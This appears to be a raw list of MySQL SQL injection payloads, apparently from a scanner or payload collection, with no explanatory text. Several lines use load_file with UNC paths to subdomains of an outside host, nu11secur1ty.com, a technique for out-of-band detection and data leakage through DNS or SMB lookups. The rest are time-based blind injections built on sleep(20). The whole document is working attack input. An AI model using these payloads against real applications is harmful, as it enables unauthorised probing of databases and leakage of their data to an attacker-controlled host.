'+(select load_file('\\\\o1qcuwtqffhk48scnqp8n1ibl2rwfm3d61yoocd.nu11secur1ty.com\\ngn'))+'
PCqBJBKJ'+(select load_file('\\\\teb659pi1luyn1jnb9bxnzlw0n6kuai1lpdc30s.nu11secur1ty.com\\udp'))+'
'+(select load_file('\\\\teb659pi1luyn1jnb9bxnzlw0n6kuai1lpdc30s.nu11secur1ty.com\\udp'))+'
+(select load_file('\\\\teb659pi1luyn1jnb9bxnzlw0n6kuai1lpdc30s.nu11secur1ty.com\\udp'))+'
'
''
aKZXBAut'+(select*from(select(sleep(20)))a)+'
'+(select*from(select(sleep(20)))a)+'
+(select*from(select(sleep(20)))a)+'
DMVUbvbY'+(select*from(select(sleep(20)))a)+'
